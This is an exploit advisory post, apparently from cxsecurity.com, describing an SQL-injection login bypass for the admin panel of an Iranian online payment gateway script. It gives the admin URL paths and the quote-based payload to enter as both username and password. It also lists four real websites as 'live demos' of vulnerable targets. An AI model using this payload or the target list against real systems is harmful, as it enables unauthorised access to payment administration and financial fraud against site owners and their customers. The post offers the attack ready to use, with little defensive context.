( دروازه پرداخت آنلاين طراحان وب ) Admin Bypass Scripts Payment Gateway

2016.08.12
Risk: Medium
Local: Yes
Remote: No
CVE: N/A
CWE: N/A

############################################################## # Exploit Title: Admin Bypass Scripts Payment Gateway ( دروازه پرداخت آنلاين طراحان وب ) # Date: 8/12/2016 # Exploit Author: Iran Cyber Security Group # Discovered By: sir.h4m1d # Vendor Homepage: iranwebhost.ir # Version: All version # Tested on: Windows ############################################################## [~] VULNERABILITY}~~ http://www.Site.com/pay/admin/ or /payment/admin/ [~] EXPLOIT: Username: '=' 'OR' Password: '=' 'OR' ############## [~] LIVE DEMO: # demo 1 : http://www.afpelevator.com/payment/admin/ # demo 2 : http://www.mahsan.net/pay/admin/ # demo 3 : http://www.iranwebhost.ir/pay/admin/ # demo 4 : https://bartarinpanlsms.net/pay/admin/ ###################################################################### # Contact mail: eblis@yahoo.com # Offecial Website: http://iran-cyber.net # My Team : MOHAMAD-NOFOZI , root3r , sir.h4m1d , Promis , white.wolf , mr.s4jj4d , mr.turk , 0day , pi.hack , l3gi0n , nazanin_wild , 0xdevil #############################################################################


Vote for this issue:
0%
100%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top